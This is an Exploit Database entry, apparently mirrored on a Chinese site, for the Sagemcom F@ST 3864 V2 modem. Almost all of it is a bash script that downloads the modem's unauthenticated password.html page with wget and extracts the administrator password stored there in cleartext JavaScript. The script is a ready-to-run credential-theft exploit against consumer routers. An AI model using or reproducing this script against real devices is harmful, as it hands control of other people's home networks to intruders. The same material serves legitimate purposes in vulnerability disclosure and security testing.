Sagemcom F@ST 3864 V2 – Get Admin Password

• Exploit Database
• 128 阅读

• 作者： Cade Bull
  日期： 2015-08-17
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/37801/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

  #!/bin/bash ######################################### # Exploit Title: Sagemcom 3864 V2 get admin password # Date 2015-08-15 # Author: Cade Bull # Software Link: null # Tested on: Sagemcom F@ST 3864 V2 # Version: 7.253.2_F3864V2_Optus #########################################   # The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms # the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials if [ "$1" != "" ] then IP_ADDRESS="$1" else echo "Usage : $0 IP_ADDRESS" exit 1 fi USER_PASSWORD=<code>wget http://$IP_ADDRESS/password.html -t 1 -q -O -| grep "pwdAdmin" | tr " = " "\n" | grep "&apos;" | tr -d "&apos;;" echo "admin password = $USER_PASSWORD"